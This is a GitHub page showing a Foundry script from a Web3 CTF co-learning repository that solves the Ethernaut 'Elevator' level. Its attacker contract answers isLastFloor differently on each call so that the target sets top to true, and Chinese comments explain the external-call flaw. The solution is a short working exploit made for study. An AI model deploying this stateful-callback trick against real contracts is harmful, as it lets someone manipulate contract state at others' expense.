forked from DeFiHackLabs/Web3-CTF-Intensive-CoLearning
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Lev11Sol.s.sol
41 lines (34 loc) · 1.07 KB
/
Lev11Sol.s.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../src/Elevator.sol";
import "forge-std/Script.sol";
import "forge-std/console.sol";
// target 讓合約的電梯能到達頂樓 bool top = true
// 此合約的風險 external call 錯誤運用
// 呼叫同一個 external call 兩次卻能得到不同的回傳結果
contract attackCon {
bool myswitch;
Elevator public lev11Instance =
Elevator(0x249785dac78DB5559d8B982F413297195430223e);
function startAttack() external {
lev11Instance.goTo(1);
}
function isLastFloor(uint _floor) external returns (bool) {
// 問題 _floor 在這邊是要?
if (!myswitch) {
myswitch = true;
return false;
} else {
return true;
}
}
}
contract Lev11Sol is Script {
// Elevator public lev11Instance = Elevator(payable());
function run() external {
vm.startBroadcast(vm.envUint("PRIVATE_KEY"));
attackCon startInstance = new attackCon();
startInstance.startAttack();
vm.stopBroadcast();
}
}